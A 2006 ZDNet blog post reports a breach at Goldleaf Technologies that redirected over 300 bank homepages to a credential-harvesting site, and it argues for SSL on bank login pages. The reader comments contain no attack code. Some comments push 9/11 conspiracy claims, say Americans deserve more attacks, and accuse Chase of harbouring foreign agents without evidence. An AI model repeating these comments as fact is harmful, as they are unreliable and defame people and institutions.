ie8 fix
madison

Real World IT

George Ou
Home / News & Blogs / Real World IT

300+ Bank homepages hacked and redirected!

By | June 1, 2006, 12:11am PDT

Summary: A little more than half of the 600 hosted bank sites were modified to redirect traffic which puts the total number of Banks affected at over 300. The homepages of those banks were modified so that they would direct all online banking traffic to a malicious site in Madrid Spain to collect login credentials from unsuspecting customers.

Goldleaf Technologies, a unit of Goldleaf Financial Solutions, Inc. which provides homepage services for financial institutions and banks had one of its servers hacked last Thursday on May 25th.  I was initially alerted to this by a concerned customer who received an email notice from his bank that ALL customer passwords had been reset to their default password.  Several news outlets covered the story by merely posting the Goldleaf official press release verbatim which characterized the breach as a "phishing incident" so the details were initially murky.

The AP Wire was one of the few that characterized the incident as a security breach and were quoted by a Goldleaf spokesperson that 150 to 175 sites were affected.  When I asked Goldleaf’s spokesperson, he characterized the AP information as wrong and told me that a little more than half of the 600 hosted bank sites were modified to redirect traffic which puts the total number of Banks affected at over 300.  The homepages of those banks were modified so that they would direct all online banking traffic to a malicious site in Madrid Spain to collect login credentials from unsuspecting customers.

While this is technically similar to phishing, it isn’t the same thing because phishing normally involves spoofed email that purport to be from the bank when they’re really from criminals that send emails with legitimate looking URLs that instead send you to a malicious webpage.  In this case, the actual bank homepage is what’s redirecting you to the malicious site which could only happen if the bank’s homepage was compromised.  This tends to be a bit more dangerous since customers usually expect some safety when they’re surfing the real banking site.

Goldleaf representatives were extremely careful not to use the word hack and instead focused on the word "redirect".  This isn’t surprising since a company handling most of the world’s Visa credit card transactions literally went out of business in the course of weeks after a hacking incident.  In Goldleaf’s defense, their security administrators noticed and stopped the malicious activity within 90 minutes of the initial compromise and they immediately notified the authorities and all of the banks that they were hosting.  The problem is that Goldleaf’s servers were hacked in the first place, but at least they were quick to respond.

The truth of the matter is that this type of exploit isn’t a whole lot different than banks not using SSL for their online banking user login which I have been hammering lately.  Goldleaf has at least fixed their issue in a matter of hours when I still can’t get banks to implement SSL after weeks.  Even when I followed up on the subject and called the major credit card companies like Chase and American Express, I was given the run-around by public relations that someone will get back to me but I haven’t heard a thing in weeks.  When banks are so lackadaisical to begin with about E-Commerce security and customer data, it doesn’t help the security situation and all of us as consumers end up absorbing the losses in higher costs in goods.

The banks complain about email phishing scams, but they won’t even do something as simple and inexpensive as implementing S/MIME digital signatures for official email notifications to their own customers.  S/MIME is a ubiquitous standard that allows nearly every email client in the world to do strong authentication and encryption.  It seems like until there is more pressure on the banking institutions to do the right thing, they’re going continue being sloppy as usual.  As a customer of one of the guilty non-SSL banks, I’m considering changing to a bank that cares a little more about security if they aren’t willing to change.

Kick off your day with ZDNet's daily e-mail newsletter. It's the freshest tech news and opinion, served hot. Get it.

More from “Real World IT”

Topics

Disclosure

George Ou

http://blogs.zdnet.com/Ou/?page_id=557

Biography

George Ou

George Ou, a former ZDNet blogger, is an IT consultant specializing in Servers, Microsoft, Cisco, Switches, Routers, Firewalls, IDS, VPN, Wireless LAN, Security, and IT infrastructure and architecture.

Related Discussions on TechRepublic

Did you know you can take part in these discussions with your ZDNet membership?
Ask a Question Start a Discussion
82
Comments
Add Your Opinion

Join the conversation!

Just In

Solution: SARBANES OXLEY
thegestunkenaraygun 9th Jun 2006
I know that the banking industry is usually subject to its own regulatory regime, but SOX has got to be in the minds of the auditors. It's a pain in the butt, but by making top management personally liable when material defects in the controls over financial accounting are identified and not addressed is a big incentive to fix this kind of stuff.
View in thread
0 Votes
+ -
2 remarks...
Arnout Groen 1st Jun 2006
First:
And how often are you planning to be in Europe, George? silly (In Europe we can log in safe in our bank accounts.)

Second:
That 90 minutes response time could be much longer when the 'hackers' started their hack from their living area 'somewhere' in Asia in the morning. In that case, US banks are closed and won't open for another 12 hours, thus enlarging the window of oportunity for stealing log in credentials.

"Unless there are other safety measures in place"
0 Votes
+ -
Ok, rub it in
georgeou 1st Jun 2006
Ok, rub it in on us Americans happy. Yeah yeah, I know the European banks don't do this and they often use smartcards.
0 Votes
+ -
But why..
Arnout Groen 1st Jun 2006
don't they (US Banks)use them?

I can't believe that US banks consist of a bunch of mules, donkeys and morons.... (Well, perhaps they are on a technological level).

In Europe, login into a bank account goes something like this:

Username = bankaccountnumber + cardnumber
You'll get a login code from the bank, which you enter into your identifier... You'll get a respons, which is your real login code to get acces to your bank account.

To provide that login code a few inputparameters are necessary for an algorithem: Account number, card number, Personal Identification Number, current date/time.

This is just an extra layer of defence against abuse. (WE use SSL). How is this done in the US?
0 Votes
+ -
My Honest Opinion, and it hurts to say this
nucrash 1st Jun 2006
The Majority of Americans fit into 3 stereo types: Fat, Lazy, and Stupid.

Most companies work along a re-active instead of pro-active standard. This involves everything. until something goes wrong, why should we fix it? Most Americans don't care to change their ways either. Consumers are as bad as the companies they buy from. They choose to eat out more rather than cook at home. And if they choose to cook at home, they have to have something that requires little more than a microwave or possibly use the stove.

Until Americans and I mean all Americans, refuse to change their instant gratification mentality, they will continue to become lazier and more complacent and lose their #1 spot in the world.
0 Votes
+ -
LOL
Linux Advocate 1st Jun 2006
You type the truth... and yet someone will come and bash you for it and that is the pity!
0 Votes
+ -
Oh, that's why...
Arnout Groen 1st Jun 2006
One of our politicians is going to work at the American Enterprise Institute.

A big chance her deception and deceit won't be noticed by Americans.
0 Votes
+ -
Oh We will notice
nucrash 1st Jun 2006
We just will be too lazy to care or do anything about it. In the US, Stupid is really the wrong way to describe Americans, I just use it hoping that some one will try to prove me different.

The most any Americans would probably do is complain at the water cooler. Past that, Americans just don't care to act. Usually too inconvienient. Even if they do, they are easily misled to assume that a solution is an easy one. Such as with Gas Prices, they think that Bio fuels or Hybrids will make the evil oil companies go away. Some of them don't care to consider moving closer to work or walking, or finding some mass transit system. I am amazed that over in Japan, they have huge amount of parking spots at manufacturing facilities for bicycles. At my place, even though I live right out side of town, there are a total space for 10 bikes. This is a factory that employs over 1000 people. I think I seen 3 bikes at the most used. One of the people who uses it is Chinese. Wonder why that is.

Americans can't use common sense to fight the battle of the bulge. They would rather go spend money at the gym rather than walk to work. Guess which one would save more money?

I know that this rant is lengthy, but I can't help but be pissed at the gross complacency of my nation. After all, I want to take a girl out this weekend, I have to spend $50 dollars just to get her there and back because Joe Blow is too lazy to walk to work. I would rather spend that money on the hard working waittress that will be serving me. Or maybe a new iMac just to argue with George more on that subject.

Another example that continues to piss me off is the cities of the US. People get sick of a neighborhood looking trashy, so they move just outside of town to a newly developed suburb, then it gets trashed, and they move to another suburb. Soon you have 12346239147 trashed suburb and a dying downtown and you can't figure out why downtown can't get business, rent apartments, or look decent. Cityfolk, Fix your neighborhoods up before moving out of them. New York City is making great strides to fix up alot of their neighborhoods. St. Joseph Missouri is another place that is trying to promote cleaner neighborhoods. Take up after them. Then quit sprawling and get a mass transit system.

One last thing that I wish would make a comeback is the railway system. I think that would help transportation through most of America. Our rails are crap and they need to be fixed.

Egad, with all that wind, perhaps I should take a stab at politics.
0 Votes
+ -
Well...
Arnout Groen 1st Jun 2006
Enjoy the weekend with you're girlfriend, but get used to spending money if you're building up a serious relationship. (E.g: Why spending money on a new Imac, We need to redecorate the house or you/i need to buy new clothes)

Maybe it's cheaper to date George wink. After all:
He got 2 jobs, can pay for his own mealand hardware and can participate in a dinnertable discussion about hard/software.

NO HARD FEELINGS George... (just to make sure)

About cleaning up your neighborhood; I agree on that point, but remember that's an educational issue. If children don't learn to clean up their mess, how do you think they will act as grown up adults?

About the railway system: What's the chance they'll improve. From what i know about the US, probably zero. That is, as long as you're (US) airlines are selling tickets at dump prizes and oil and gas are reletively cheap. (In Europe we pay 1.5 US dollars a litre.)
0 Votes
+ -
nice rant
shraven 1st Jun 2006
So, are you one of the other 2 bikes at your work, or are you just full of crap about how other people are the problem?
0 Votes
+ -
I am part of the problem
nucrash 1st Jun 2006
I won't deny that I am not part of the problem, but I am slowly trying to fix my problem. If I set the example, will I lead the way? Probably not, but for those who do, I gladly cheer on.

If I haven't given up my car, you may ask what do I do to help become less of a problem. I walk to the local taverns instead of drive, which saves on gas and DUIs. They are about a mile away. I walk to my gym, which is about half a mile away. I cut down on using electricity by not watching the tele and reading a good book instead, "Hacker's Handbook" was last night. I don't eat out as much as I used to, which cuts out on the economy, but is better on my health. I don't own an SUV, but instead a Super Charged car, which I guess is still part of the problem. I refuse to drive a hybrid though, I feel that the long term effects of the battery are not any better for the environment than the gasoline engines.

I do work out more and strive to expand my knowledge by learning Nihongo written and spoken. Still having a tough time on the Kanji Characters. My goal is also to learn Hangul and Espanol.

So... Am I fat, lazy, and stupid. Sure, but atleast I am making an effort to counter that.

I figure I will be ready to start biking to work some time in July. I want to be in shape first.
0 Votes
+ -
Wow! You are so on
999ad@... 1st Jun 2006
the money!!!! Well put observation.
0 Votes
+ -
yup, too true, and it DOESN'T hurt for me to say it
Spicoli the Cannoli 1st Jun 2006
I am sick and tired of the average American's mentality. The average American wants EVERYTHING served up on a silver platter, and doesn't want to work even ten seconds for it.
Not only that, but on top of it, Americans have this elitist attitude like they're better than the rest of the world, and "rightfully" so. They feel like the higher standard of living America has over most other countries is because Americans somehow are just "better" people and are more "with it", and not because the US government has been aggressively raping the world since the second half of the 20th century.
Most Americans have never even held a gun in their whole lives, and yet feel "justified" in illegally invading one country after another on the drop of a whim.
The only reason Americans are marginally interested in politics nowadays is because finally the US government is coming to banrupt and enslave them, like it has been doing to the rest ofthe world for decades. So their interest is PURELY self-interest, and thus can't be looked at as though it's in any way noble.
Americans are NEVER going to change their instant gratification mentality, because they don't want to, and big industry is only to happy to keep cashing in on Americans' seemingly endless indulgent desires.
Americans value entertainment MUCH MORE than they do real freedom, which is precisely why America is being dismantled with what seems relative simplicity.

We're coming up to the 5th anniversary of 9/11, a mass homicide carried out in broad daylight, and STILL there has not been an official thorough investigation. How can anyone possibly sympathize with a people who are OK with mass murder not being investigated? I hate to say this, but apprently Americans are deserving of more 9/11s, and they will get them at some point in the future..and considering how easily the US government was able to snooker people with 9/11, I unfortunately will not be the least bit surprised when the government fights tooth and nail to avoid an official investigation into whatever future terrorist acts occur on US soil, destroy most all the evidence, needlessly classify the rest, and then try to shame anyone that dares question whatever sorry scientifically impossible conspiracy theory the US government expects everyone to believe without suspicion..
..and Americans will swallow another round of horse crap like good wittle complacent slaves..
0 Votes
+ -
You were doing fine until the last paragraph
Mark Miller 2nd Jun 2006
I don't take your dim view of Americans (I am one), but I thought most of your criticisms had some merit.

We're coming up to the 5th anniversary of 9/11, a mass homicide carried out in broad daylight, and STILL there has not been an official thorough investigation.

Oh I see. So the 9/11 Commission was just a whitewash then? Sorry, that doesn't wash with me. The closest thing we've had to a legitimate challenge to the 9/11 Commission's findings was an investigation into a purported Pentagon-authorized operation called "Able Danger". The accusation was that the people in on the operation had gathered information about some of the 9/11 hijackers before the attack, but were blocked from sharing it with authorities who could've acted and maybe stopped the attack before it occurred. The whistleblowers on the matter didn't dispute that the hijackers were in fact the ones the government named, but rather claimed that Able Danger had information on a few of them in 2000, during the closing months of the Clinton Administration.

and then try to shame anyone that dares question whatever sorry scientifically impossible conspiracy theory the US government expects everyone to believe without suspicion..
..and Americans will swallow another round of horse crap like good wittle complacent slaves..

You know I think more Americans would listen to you if you'd lay off the conspiracy theory crap. Making general statements of this nature isn't going to get you any legitimacy.
0 Votes
+ -
try learning more..
Spicoli the Cannoli 2nd Jun 2006
..yes, the 9/11 Commission WAS a whitewash, but more importantly, it was not an investigation into the crime itself but rather the supposed "intelligence failures". This would be like a police department calling off an invetigation into a homicide, and instead "investigating" why police didn't respond quickly enough to the victim who called in to report a break-in, as though this makes up for investigating the crime itself.

"The closest thing we've had to a legitimate challenge to the 9/11 Commission's findings was an investigation into a purported Pentagon-authorized operation called "Able Danger"."

Well, you see, once again if you were more informed you'd know that there were so many discrepancies in what was presented at the 9/11 Commission that an entire book was written on it!

"You know I think more Americans would listen to you if you'd lay off the conspiracy theory crap."

People like yourself truly make me laugh. You attack anyone that questions 9/11 as a conspiracy theorist, and yet don't even stop to think and realize that what the US government has presented as the "official version" of events is ALSO a conspiracy theory!!!..unless you can point me to all that ample freely available HARD EVIDENCE conslusively proving beyond all doubt that Osama bin Laden and Al-Qaeda were the true sponsors of 9/11..either cough up the evidence, or continue to look like a MORON.. wink
0 Votes
+ -
Speak for yourself, Spicoli
Mark Miller 2nd Jun 2006
I saw a videotape the military had recovered from Afghanistan where bin Laden discusses with his cohorts how he watched the attacks on TV. In it he discussed that he knew when they were going to happen, and he knew how many planes he was expecting to hit targets.

In an audio recording of a meeting he had with others, he discusses how he noticed that there was supposed to be a 4th plane to hit a building that didn't hit its target.

In the videotape he also talked about how he was surprised that the towers collapsed so completely. He said he debated with his collaborators before the attack about how much damage the planes would do to the WTC. He said he expected that the floors above the crash site would collapse/fall over, but that the lower floors would remain standing. He attributed the total collapse to "the hand of Allah", crushing them.

I saw/heard these tapes on cable news, as well as other cable outlets. I may have seen the videotape on the internet as well. I was very interested in reading the whole translated dialog, which was shown in subtitles below the video. All of their discussion was of course in Arabic, a language I'm not familiar with. So I had to count on the government's translators to understand what they were saying.

Secondly, documents were recovered from Mohammed Atta's living quarters, which spoke in a kind of coded language about which buildings they were going to hit. One of them I remember was called something like "the ministry of defense" (the Pentagon), the other, which did not get hit, was "the house of legislation". Again, what I learned of them was what was translated from Arabic into English.

Thirdly, I heard the story about how the airline stewardess on one of the flights that crashed into the WTC phoned in to her airline the names of the passengers who were the hijackers. She passed on the information during the hijacking, but before the crash, of course. She had the passenger manifest, and knew where they were sitting before the attack commenced on her flight. This list was then passed on to the FBI, I believe. All of the names she mentioned sounded Middle Eastern. Mohammed Atta was one of the names on her list. The government gathered up the other passenger manifests for the other flights that crashed. They took the known list from the flight attendant on the one flight that crashed into the WTC and drew connections to the other hijackers on the other flights. How they did this, I don't know. It's possible they used CIA information, but I'm just speculating. Some of the hijackers were people that the CIA had on its list of known terrorists, before the attack occurred. The problem was that the CIA had little to no relationship with the INS, the agency that handles immigration matters. Secondly, even if the CIA had information, it would've been difficult for them to act. There was a legal wall of separation between the CIA and FBI. The CIA was forbidden from taking actions within the U.S. It's the FBI's job to do that, but they're strictly in the mode of prosecuting criminals. They would have had a hard time accepting information from the CIA, since the FBI cares about proper gathering of evidence for presentation in court. In general, the government was not organized to anticipate this sort of attack. It was organized to fight the Cold War, which had been over for more than 10 years. Nobody said the government is organized efficiently.

So yes, I'm convinced that Al Qaeda committed this act of war. You'd have to convince me of a lot of other things for me to believe that the government coordinated the attack on itself.
0 Votes
+ -
Fat, Lazy, and Stupid.
Jack-Booted EULA 1st Jun 2006
You missed the arrogance, intolerance, and greed.

:o)
0 Votes
+ -
And everyone else is perfect I guess, especially the terrorist nations
georgeou 1st Jun 2006
If anyone's lazy, the Europeans work far less than Americans. As for the other stuff, I'm sure you probably feel that the rest of the world is better, especially the terrorist nations.
0 Votes
+ -
hmmm.
Jack-Booted EULA 1st Jun 2006
There you go jumping to conclusions and making assumptions, again.

And what exactly do terrorists have to do with the premise presented, cupcake?

But, come to think of it, I'd be willing to guess that they're anything but fat or lazy. Stupid, maybe, esp. the ones that get caught.

:o)
0 Votes
+ -
We can't have the terrorists getting caught now could we
georgeou 1st Jun 2006
"Stupid, maybe, esp. the ones that get caught."

We can't have the terrorists getting caught now could we.
0 Votes
+ -
There's a general difference between...
Arnout Groen 2nd Jun 2006
Europeans and Americans....

You live to work, while we work to live.

This doesn'mean every European and Amarican lives by this rule :o
0 Votes
+ -
I'd be careful with that
Mark Miller 2nd Jun 2006
I'm not sure how this happens, but I've heard it said that the French are actually more productive than we are...while they're working, at least. They take 6 weeks off out of the year. Maybe the reason they are more productive is they're rested? Or maybe they're playing with statistics. I dunno. I can accept the argument that with increased hours on the job, comes increased fatigue and diminishing returns. Maybe that explains it.
0 Votes
+ -
And yet...
nucrash 2nd Jun 2006
Who are you criticizing about security? And who are you complementing about security.

My Fat, Lazy, and Stupid comment falls to the general populace. Not that we don't have some of the most elite individuals in the world in this nation. How else did we become the computing power that we now are.

Real World IT should see it just as much as anyone else. Americans have become complacent and complain about losing jobs to overseas markets instead of thinking of new ways to create jobs.

I am proud of what this nation has accomplished, and feel that this nation isn't done yet. But being the top dog only means that everyone else in the world is now wanting your spot. Reasons why I fear China and India, because of their shear man power and will to take it.

Unfortunately, I don't feel that I, nor many of the people in this area care to do enough to keep the United States in the top spot.

Just my not so humble opinion.
0 Votes
+ -
Fat lazy and stupid?
georgeou 1st Jun 2006
Americans are among the few in the world willing to criticize themselves. Europeans are far lazier than Americans if you look at their work patterns. As far as fat, that's a sign of wealth in most places. As far as stupid, I guess everyone likes to call the most sucessful person on the block stupid.
0 Votes
+ -
About half the USA banks do
georgeou 1st Jun 2006
About half the USA banks do and half don't. It's stupid and I'm trying to change that.
0 Votes
+ -
Reminds me of something... Ooooh Canada!!!! (NT)
ju1ce 1st Jun 2006
(NT)
0 Votes
+ -
They do not care too much about the pain / losses of customers.
michael_t 1st Jun 2006
Until recently ONLY California had actual LAWS to inform affected individuals in cases of ID theft; So someone can snatch your pesonal id and the custodial of this information (banks or credit card or credit bureau, etc) did not have to notify you of it.

Recently some more states passed laws to .... safeguard personal id data !

It is AMAZING that in a Consumer SUPER-oriented sociatey it is the consumer who is NOT much safeguraded against organized crime....
0 Votes
+ -
I'm waiting for Washington Mutual to get hacked.
olePigeon 1st Jun 2006
Windows with IIS and ASPs. That's awesome for secure banking.

(Just incase you missed the sarcasm.)
0 Votes
+ -
Banking Authentication
brandie.anderson@... 1st Jun 2006
In an effort to put your mind somewhat at ease, I just wanted to let you know the FFIEC
(Federal Financial Institutions Examination Council) has issued a January 1st, 2007 deadline for all U.S. banks requiring secure online access. While there are no audit specifications, most believe a simple username/password combination will cause the banks to fail.
0 Votes
+ -
That's not the issue
georgeou 1st Jun 2006
I don't care how many questions they ask me like where I was born or what picture I selected when logging in, it's all useless if the site doesn't use SSL for the default login page.
0 Votes
+ -
So SSL wasn't being used
ebrke 1st Jun 2006
on these login sites that were redirected? Could people have protected themselves from this by looking for the security certificate? If so, this would appear to add weight to your recent columns, George.
0 Votes
+ -
Ask the typical home user what a Security Certificate is...
BitTwiddler 1st Jun 2006
And you'll get a long, deep stare.
0 Votes
+ -
the typical home user
Yagotta B. Kidding 1st Jun 2006
How about the admins at the banks? What's scary is that they don't know what they are.

My concern isn't what the "typical home user" knows, because they'll take what the admins give them. I'm more concerned about the fact that the knowlegable user doesn't have the choice of reasonable security.
0 Votes
+ -
How cna you be concerned about the knowledgeable user?
ju1ce 1st Jun 2006
"I'm more concerned about the fact that the knowlegable user doesn't have the choice of reasonable security."

Switch banks, talk to your bank.. Atleast you know the issue.

Un-informed, or the uneducated (which is the majority of home users) have no idea what SSL is, have no idea what a secure connection is..

Heck try convincing them to even use online banking? Many won't because they don't trust it.. And things like this just add fuel to the fire.
0 Votes
+ -
Although I agree with your SSL assessment George...
ju1ce 1st Jun 2006
I don't believe it's the be-all end-all approach since most don't even pay attention or even know what that little lock means.

How do you get customers to know they are on a secure connection? How do we get them to know they are being redirected to another "mischevious" site?

How do security people like yourself educate users enough to know the signs?
0 Votes
+ -
You're right, but a differnt fight
georgeou 1st Jun 2006
" don't believe it's the be-all end-all approach since most don't even pay attention or even know what that little lock means."

You're right Ju1ce, but it's basic security that the banks should be implementing.
0 Votes
+ -
I don't think it is...
ju1ce 1st Jun 2006
Since even if pages were "redirected" from supposed "secure sources" regular consumers would know what to watch for an hence avoid it should it arise.

I think SSL in it's entirety is a basic security that shouldn't be relied on as the be all end all.

Even if the site had SSL and was Phished.. Would it really have stopped? I'm going to say it with 100% confidence that no it wouldn't.

That basic security is the problem, but also the person between the keyboard and chair.

It's funny how computers have made people so dependent on others for security when before computers people relied on common sense and proven methods. :P Instead they leave it up to "supposed" experts (no cut against you in this regard George) to do it for them, and then cry about it when they can't stop something.

Even security experts are human. And security experts make mistakes, and are really at the mercy of the programs/tools they use. happy
0 Votes
+ -
Since when did people rely on common sense?
georgeou 1st Jun 2006
"when before computers people relied on common sense and proven methods"

Really? There is a reason that common sense isn't so common. I don't disagree with you that SSL isn't enough, that doesn't mean it's an excuse NOT to use it which is often the case. I hear too many people saying that SSL isn't perfect so why use it.
0 Votes
+ -
Oh George.. I agree use it.
ju1ce 1st Jun 2006
As I said.. But it isn't the be all and end all of user sense. happy
0 Votes
+ -
It's worse than you think
progan01@... 1st Jun 2006
My bank was recently absorbed by JP Morgan-Chase (now usually just called "Chase"). Prior to the merger, I visited the Chase.com site to read their online banking and user privacy policies.

Twenty minutes after I visited the site, I got a phishing note telling me my Chase account had been compromised, and to please click on this link to verify. I reported the incident to the FTC, to Chase and to my own bank. That's a pretty fast exploit from visiting Chase.com. It told me that the Chase.com site has been compromised by a sniffer, and probably has for some time.

That was only the first of many such attempted frauds, but the real struggle was convincing Chase.com that the problem was within their own site and possibly inside their own networks. I'm not sure I got through to them.

But more recently I had all confidence in Chase's ability to maintain user security removed by the following incident.

Chase.com switched my secure login page to a non-secure login page. No SSL, as my old bank had used. The fields for user ID and password were on a non-secured page, and apparently transmitted in the clear.

I sent in an e-mail complaint through their contact link. I got back, in five days, an e-mail saying that the issue was too complicated for a reponse by e-mail and to please call their tech help line during working hours.

My call went badly. After navigating the automated vestibule, the first help contact did not understand the issue. She referred me to a second help contact who was only slightly more knowledgeable. He was initially unable to help me because, as he attempted to get to the Chase.com site, his computer froze and he had to reboot.

He did not seem to know about secure socket layer encryption. He had no supervisor on the site willing to come on the line -- though apparently he or she was monitoring the call from nearby, as my help contact twice put me on hold to ask questions.

I finally received the answer from this Chase.com technical help rep that the FIELDS in the non-secured form in fact WERE secured. And that he could prove it. All he needed to prove it was for me to type in my ID and password and show me how I would be connected to my secure site!

This, I informed him, was exactly what I would NOT do. There was no way to verify on my end that the transaction was in fact secured. He had no other way of showing me that in fact the transaction WAS secure except to have me go through an unsecured access page.

The help contact's ignorance apparently was not personal. He had been trained in courtesy and phone manners. He really was uninformed about Web security and about SSL encryption. I have to think this was deliberate Chase policy.

So Chase.com actually removed security from their homepage for user 'convenience' and put unknowledgeable help personnel on their phone banking lines equipped with erroneous information -- perhaps deliberately misleading information intended to lull an unsuspecting public about Chase.com online banking security.

Since Chase.com had their accounts hacked two months ago by someone redirecting customer information to a network belonging to one of their Chinese partner banks, this exchange with Chase.com tells me that their security is in fact culpably weak, and was deliberately made weaker. This suggests to me that Chase.com may not only have had its systems compromised, but that there may be agents of foreign powers or criminal organizations already in place within the Chase.com organization who are feeding customer information to unauthorized hands.

In any case, Chase.com is a dangerously unsecure banking environment. I have no faith in their computer system, their IT staff, their security policy, or indeed their ultimate purposes as a bank. They appear to have been penetrated technologically and they may have been infiltrated by people with an interest in weakening Chase.com security for nefarious and fraudulent purposes. The scale of this fraud and its ultimate ends can scarcely be guessed at. If somebody were to suggest that Hizbollah or Al Qaeda had operatives inside Chase.com I could not refute them.

The Chase.com homepage remains unsecure to this day. Take a look: http://www.chase.com/

You'd better check your own bank site. And I mean today. The credit history you save could be your own.
0 Votes
+ -
No fan of chase, but...
Sxooter_z 1st Jun 2006
I'm no fan of chase, seriously. My ex wife is moving her accounts from there as we speak due to their incredible poor customer service.

However, if you look in the source for their home page, you'll see that the log in form has

action="https://chaseonline.chase.com/siteminderagent/forms/formpost.fcc"

in the form tag.

So, it IS secure.

I get emails all the time that my chase account is insecure, by the way. This proves nothing, especially since I don't even have an account there.

That said, I do think that instead of a login form on an insecure page, they should have a "go here to login" link so that you log in on an https page.
0 Votes
+ -
Chase insecurity
progan01@... 1st Jun 2006
In fact I did suggest to the second Chase help rep that a link to a secure page for user logon would help. He said he'd pass the suggestion on. We can all see how that's been ignored.

The Javascript fetch you mention does not preclude spoofing the traffic to that address, which SSL would at least identify as being redirected. It is not a secure logon, no matter what Chase.com says.

As for the phishing attempts you get about your nonexistent Chase.com account, do what I do: Display with full headers, get 'properties' on the link they want you to click, then forward the note AS AN INLINE TEXT MESSAGE ONLY to:

spamATuce.gov (FTC Spam Reporting)
abuseATjpmchase.com (Chase.com spam, phishing, etc.)

with AT replaced by the 'at' symbol, of course.

At the top, note that this is a phishing fraud and that the link in it actually connects to this address, and paste in the real address from the spoofed link you copied.

I also send along the addresses and links within any graphics, but this is optional.

This should reduce your spam traffic. I recommend it heartily, as the people who phish Chase.com have a lot of help from inside the organization -- through simple incompetence or actual malice it's not possible to tell. Treat the witness as hostile.
0 Votes
+ -
Are they doing this for convenience?
Mark Miller 2nd Jun 2006
One of the complaints I used to hear about SSL-secured pages is they loaded slowly. This was because all of the page's content was encrypted coming down to the client. I don't know if this made the data blob coming down bigger or not. The browser then had to decrypt it before displaying it. Apparent performance is especially an issue with people who use dial-up connections (which is a minority now, as I understand it).

If you'll remember most login pages used to be SSL-secured right when they loaded. Maybe the reason web designers came up with this way of doing it is so that the login page loads quickly, but still secures the user ID and password information when the user submits it. They weren't thinking about the usefulness of SSL authentication.
0 Votes
+ -
SSL performance is now moot
georgeou 2nd Jun 2006
Offloading SSL to a reverse proxy, using a load balancer, or just using a modern server or hardware acceleration makes performance issues moot. SSL doesn?t really make pages that much bigger so dialup isn?t an issue. This is just pure ignorance on the bank?s part.
0 Votes
+ -
Login page DOES use SSL
optimist134 1st Jun 2006
Go to www.chase.com, turn off SSL in your browser, and try to login. You can't because SSL is disabled. Some folks seem to be awfullly paranoid!
0 Votes
+ -
Login page is NOT SSL-protected
progan01@... 1st Jun 2006
The page still transmits your data in the clear. Checking your browser for SSL compatability does NOT secure the data exchange.

George Ou is right; the page itself is vulnerable to spoofing, whether through a pharmed DNS address or, as I have seen, an actual takeover of the non-protected page. A Houston credit union was the victim of one such phishing attack when the site was down for maintenance. For three hours. Hackers pirated the URL and redirected its traffic to their chosen site as users were bombarded with phishing e-mails. I don't think many other people reported it when it happened.

Identity theft is a multibillion-dollar problem and it is worsening. A lot of criminals count on complacency and user ignorance to steal their information. Chase.com is not helping by removing basic Web security from their login page.

And the next time you tell somebody that burglars can't get in through the window because there's GLASS in the way, maybe you should listen when somebody tells you to make sure the sash is locked.
0 Votes
+ -
absolutely right you are...
suirauqa 1st Jun 2006
progan01. Even the new chase credit card log-on page is not secure, and the page does not even have a link for a secure log-on. Only those who know can choose to log in from a secure page by typing in: chaseonline.chase.com which takes you to a secure log-on page. I don't really understand the logic (or the lack thereof) behind not providing a secure log-on to the customer in the name of customer convenience(!!!).
0 Votes
+ -
And - Chase TRICKS you!
xrayman 1st Jun 2006
Chase even has the GALL of putting a lock icon next to the sign-in form boxes. This is to make up for the fact that the page doesn't have an "official" SSL lock icon. To me, this is horrible.

They also have a "Security Center" which tells you that "most" forms are encrypted and then goes on to tell people what to look for to know you're on a secure site (the lock icon and https).
http://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/security_measures#2

The FAKE "lock icon" next to the boxes is an insult.
0 Votes
+ -
And here's proof of the trick!
xrayman 1st Jun 2006
Chase puts an "unofficial" lock icon next to their sign-in boxes to FOOL you that it's secure. Take a look:
http://www.chase.com
In case they decide to remove it due to the outcry, here's a screenshot I just took from my own computer:
http://aycu22.webshots.com/image/1621/1084403799961796862_rs.jpg
0 Votes
+ -
Anyone actually look at the HTML in the page?
madgrenadier 2nd Jun 2006
The sumit button performs a POST to HTTPS://chaseonline.chase.com.

Looks like the actual send of the logon credentials is SSL protected to me.

"action="https://chaseonline.chase.com/siteminderagent/forms/formpost.fcc"

--MG
0 Votes
+ -
Right you are, xrayman
progan01@... 2nd Jun 2006
But what appalled me was that the Chase.com tech insisted that the presence of that icon alone guaranteed my security. When I told him that anyone could put a lock icon onto a page, he was at a loss.

Chase therefore is not only tricking its customers, but deliberately providing false and misleading information to their technical reps. I'd say that was clear and convincing evidence of a deliberate attempt to mislead everyone as to the lack of Chase security, wouldn't you?

Obviously they know their site isn't secure. Obviously they think obscuring their own staff will keep people ignorant about Web security. The question I must asked is, Who at Chase profits from such ignorance, confusion and misdirection? At some point, you must admit, the people who profit from such a policy have interests opposed to those of their customers, the users of the Web, and the institution of banking itself.

I call them criminal, and I call for their removal by any means necessary. This isn't just stupidity. It's an attack. It demands a strong and visible response. Public, devastating and LOUD.
0 Votes
+ -
Solution: SARBANES OXLEY
thegestunkenaraygun 9th Jun 2006
I know that the banking industry is usually subject to its own regulatory regime, but SOX has got to be in the minds of the auditors. It's a pain in the butt, but by making top management personally liable when material defects in the controls over financial accounting are identified and not addressed is a big incentive to fix this kind of stuff.

Join the conversation!

Formatting +
BB Codes - Note: HTML is not supported in forums
  • [b] Bold [/b]
  • [i] Italic [/i]
  • [u] Underline [/u]
  • [s] Strikethrough [/s]
  • [q] "Quote" [/q]
  • [ol][*] 1. Ordered List [/ol]
  • [ul][*] · Unordered List [/ul]
  • [pre] Preformat [/pre]
  • [quote] "Blockquote" [/quote]
ie8 fix
Click Here
ie8 fix

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Facebook Activity

Blog Roll

Blog Archive

White Papers, Webcasts, & Resources
ie8 fix
ie8 fix